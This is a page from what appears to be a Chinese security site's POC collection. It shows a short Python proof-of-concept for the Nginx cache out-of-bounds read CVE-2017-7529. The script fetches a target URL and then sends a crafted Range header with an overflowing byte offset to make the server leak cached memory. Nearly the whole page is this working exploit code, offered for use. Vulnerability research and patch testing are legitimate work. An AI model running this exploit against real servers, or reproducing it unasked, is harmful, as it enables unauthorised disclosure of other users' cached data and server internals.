menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right POC chevron_right Nginx越界读取缓存漏洞 CVE-2017-7529.py
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Nginx越界读取缓存漏洞 CVE-2017-7529.py
    580 B / 2021-04-15 12:15:18
        #!/usr/bin/env python
    import sys
    import requests
    
    if len(sys.argv) < 2:
        print("%s url" % (sys.argv[0]))
        print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))
        sys.exit()
    
    headers = {
        'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
    }
    offset = 605
    url = sys.argv[1]
    file_len = len(requests.get(url, headers=headers).content)
    n = file_len + offset
    headers['Range'] = "bytes=-%d,-%d" % (
        n, 0x8000000000000000 - n)
    
    r = requests.get(url, headers=headers)
    
    links
    file_download